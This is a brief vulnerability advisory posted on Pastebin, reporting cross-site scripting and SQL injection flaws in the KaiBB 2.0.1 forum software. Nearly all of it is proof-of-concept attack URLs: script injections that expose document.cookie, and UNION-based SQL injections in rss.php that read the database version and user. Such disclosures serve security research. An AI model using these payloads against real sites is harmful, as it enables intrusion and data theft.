Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Vulnerability Description:
- ==========================
- KaiBB 2.0.1 is prone to XSS and SQL Injection vulnerabilities
- ==================
- Technical Details:
- ==================
- Cross-site Scripting
- http://<target>/kaibb/?'</script><script>alert(document.cookie)</script>
- http://<target>/kaibb/index.php?'</script><script>alert(document.cookie)</script>
- SQL Injection
- http://<target>/kaibb/rss.php?forum=' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL AND 'a'='a
- http://<target>/kaibb/rss.php?forum=' UNION ALL SELECT NULL, version(), NULL, NULL, NULL, NULL, NULL AND 'a'='a
- http://<target>/kaibb/rss.php?forum=' UNION ALL SELECT NULL, user(), NULL, NULL, NULL, NULL, NULL AND 'a'='a
- # [2011-10-10]
Advertisement
Add Comment
Please, Sign In to add comment